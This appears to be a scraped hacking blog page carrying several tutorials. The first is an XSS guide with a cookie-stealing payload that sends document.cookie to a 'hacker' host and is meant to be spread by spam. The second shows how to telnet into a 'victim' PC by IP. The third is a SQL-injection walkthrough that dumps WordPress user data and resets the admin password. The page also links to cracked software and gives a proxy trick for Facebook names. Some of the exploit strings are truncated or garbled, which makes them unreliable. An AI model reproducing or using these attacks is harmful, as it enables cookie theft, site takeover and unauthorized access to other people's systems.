C-T-H

Tuesday

// // Leave a Comment

How to hack a website using Cross site scripting (XSS)

What is  Cross site scripting :-



As quoted in wiky
"Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites were roughly 80% of all security vulnerabilities documented by Symantec as of 2007. Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site, and the nature of any security mitigations implemented by the site's owner."


There is no single, standardized classification of cross-site scripting flaws. but most 
experts distinguish between at least two primary flavors of XSS non-persistent
and persistent to know whats persistent and non persistent click here


In this tutorial i will explain about  Non-Persitent attack 

First of all you must find a vulnerable site .

How To Find Vulnerable Websites ?


  •  Google Hacking
  •  Using  web vulnerability scanners

Google hacking :-
Google hacking is the term used when a hacker tries to find exploitable targets and sensitive data by using search engines. The Google Hacking Database (GHDB) is a database of queries that identify sensitive data. Although Google blocks some of the better known Google hacking queries, nothing stops a hacker from crawling any site and launching the Google Hacking Database queries directly onto the crawled content.

Update:- To learn google hacking you can download  
Google Hacking for Penetration Testers book & Password from Here



Web Vulnerability Scanners:
A vulnerability scanner is a computer program designed to assess computers, computer systems, networks or applications for weaknesses. There are a number of types of vulnerability scanners available today, distinguished from one another by a focus on particular targets. While functionality varies between different types of vulnerability scanners, they share a common, core purpose of enumerating the vulnerabilities present in one or more targets. Vulnerability scanners are a core technology component of vulnerability management.

To Download Acunetix Web Vulnerability Scanner follow the given steps below

 1. First Download Acunetix Web Vulnerability  Scanner  including  Crack  from Here

 2. To get the password Click Here


After finding  a site enter a simple java script given bellow in the serch box or url bar
<SCRIPT>alert("XSS testing by ComeToHack.com");

 If a dialog box  pops up as shown then the site it is vulnerable to xss

In the above example we added a harmless alert dialog box
In the next example i will show you how we can add  more sophisticated and
dangours XSS attack to exploit users
One typical example is a simple cookie theft exploit
.

 var+img=new+Image();img.src= "http://hacker/"%20+%20                            document.cookie;

The previous JavaScript creates an image DOM object.



var img=new Image();



Since the JavaScript code executed within the http://victim/ context, it has access to the cookies

The image object is then redirected to hackers website where the victim cookies are stored


img.src="http://hacker/"%20+%20document.cookie;


Once the hacker has completed his exploit code, which looks like

http://victim/ context=">">+var+img=new+Image();img.src= "http://hacker/document.cookie;



Now the hacker will advertise this specially crafted link through spam e-mail , message board posts, Instant Message (IM)messages, and others, trying to attract user clicks. What makes this attack so effective is that
Users are more likely to click on the link because the URL contains the real Web site domain name, rather than a look-alike domain name address as in normal phishing

Hope you liked this post if you have any doubts please be free to comment

Read More
// // 1 comment

How to Hack Any Computer / Victim PC with IP


Computer Hacking is the most famous work of Hackers, Hackers got ip & play with victim easily even victim did not know what is doing hell with his Computer. Normal PC Users did not know about any security & large numbers of computer users didn't know anything about their Computer Security. ComeToHack.com Present you an easy Tutorial about How to Hack any Computer / Target computer with only IP in few simple steps. But with the help of the Metasploit feature you can even fully control his entire network or computer by just having his/her computer's IP address . Generally Hacking is the term that refers to gaining access to someone's Computer without permissions or interest.

There are some Keywords which use too much on Google for finding this method 

  • hack computer with ip address
  • hack computer with ip address command prompt
  • hack into computer with ip address
  • how to hack someones computer with their ip address
  • hack ip address using command prompt
  • how to hack a computer on a different network
  • how to hack someone with their ip
  • how to hack into other computers
  • how to hack into someones computer

Steps to Hack IP Address:



1) Prepare the IP address of the Victim. (e.g : 101.23.53.70 )


2) Download and Install Advanced Port Scanner.



3) Open Advanced Port Scanner and Type the IP Address in the right column and Click Scan.
4) It will lists you all Opened Ports of the Victim’s PC or Router. (e.g : Port 91 )
 
5) After retrieving the IP address and the Opened Ports of the Victim, Open Command Prompt (CMD)
 
and Type: telnet [IP ADDRESS] [PORT]
 
e.g : telnet 101.23.53.70  91
 
6) Now you’ll be asked to Enter Login Information, Just type Username and Password and hit Enter.
If no password is used just type the Username.

Done! Now you’ll get access to all Victim’s Files and Documents by browsing with CMD (use cd, copy, delete, mv… to do all tricks.)


Enjoy :)
Any questions comment here.
Read More

Monday

// // Leave a Comment

How to hack a wordpress site using SQLi injection

What is Wordpress??


WordPress is a free and open source blogging tool and a content management syste (CMS) based on PHP and MySQL. It has many features including a plug-in architecture and a template system.
WordPress is currently the most popular blogging system in use on the
Web.It was first released on May 27, 2003, by founders Matt Mullenweg.


Now lets move on to a hacking website.I have used here all-video-gallery(WordPress plugin) Sqli Vulnerability..
1>First we will find a Target using a Google dork

inurl:all-video-gallery/config.php?vid=




http://www.ComeToHack.com/

Open New Tab image for better preview.......




2>Open any website.... In my case its juangrial.com.

http://www.ComeToHack.com/







  • Now lets do a sql injection....copy the exploit code then hit enter then see the Magic...Smile



http://www.cometohack.com/



Exploit Code for finding username & password:
http://site.com/wp-content/plugins/all-v...,7,8,9,10,

11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37​,38,

39,40,41+from+wp_users--



http://www.cometohack.com/



You can also try this.......well Both will work the same.........


Exploit Code for finding username & email:
http://site.com/wp-content/plugins/all-v...,7,8,9,10,

11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37​,38,

39,40,41+from+wp_users-




-http://www.cometohack.com/


4>We Got admin Email......Now Let!s reset it.....



http://www.cometohack.com/



For that GO to:- http://site.com/wp-admin OR https://site.com/wp-login.php


"Then click on Lost Password"



http://www.cometohack.com/


5>Enter the Email we Got IN earlier steps...



http://www.cometohack.com/



http://www.cometohack.com/



6>Now come back and go to activation table....

* Exploit Code for activation Key:
http://site.com/wp-content/plugins/all-v...,7,8,9,10,

11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37​,38,

39,40,41+from+wp_users--




http://www.cometohack.com/

7>yeah!!!we got what we need now lets change the admin password...


goto:http://site.com/wp-login.php?action=rp&key=resetkey&login=username




http://www.cometohack.com/



http://www.cometohack.com/


http://www.cometohack.com/




8> Now open http://site.com/wp-admin




and Login with new password..........xD




http://www.cometohack.com/


Read More

Friday

// // 1 comment

How to Make Single Name on Facebook Profile / Timeline


h

In World Facebook is Now biggest social Media.Today Technoraise sharing you amazing trick Make Single Name Account On Facebook.
Note:-This Trick is Only Work On Mozila FireFox if u dnt have Mozila Fire Fox Then Dowanload From here latest Version.
Dowanlaod
Firstly Change your Browser Proxy Manually use one of the proxy from below given.
Http Proxies
119.252.160.34
202.43.188.143
118.98.35.251
36.76.182.173
61.247.45.35
180.250.169.14
180.250.82.188
119.252.160.34
219.83.100.195
110.139.125.230
202.87.254.156  
PORT:-8080
Now Save Your Setting
Now Open your Facebook Account  Name Settings.
Change your language from English (us) to Bahasa Indonesia
Then  Simply remove Your Last Name And Save it.
Now Your Facebook Account is only with First Name Without Last Name.
After Completing all steps remove Manual Proxy and select  use system proxy settings and change change
your language back to English (us).
Take a look on all steps as shown below

http://newblogspotblogs.blogspot.com

http://newblogspotblogs.blogspot.com

http://newblogspotblogs.blogspot.com
http://newblogspotblogs.blogspot.com

http://newblogspotblogs.blogspot.com

http://newblogspotblogs.blogspot.com

If You are facing any problem in make single name account on facebook then must comment below 
regard Technoraise keep visiting and keep sharing thanks :)

Read More

Earn 25$ Instant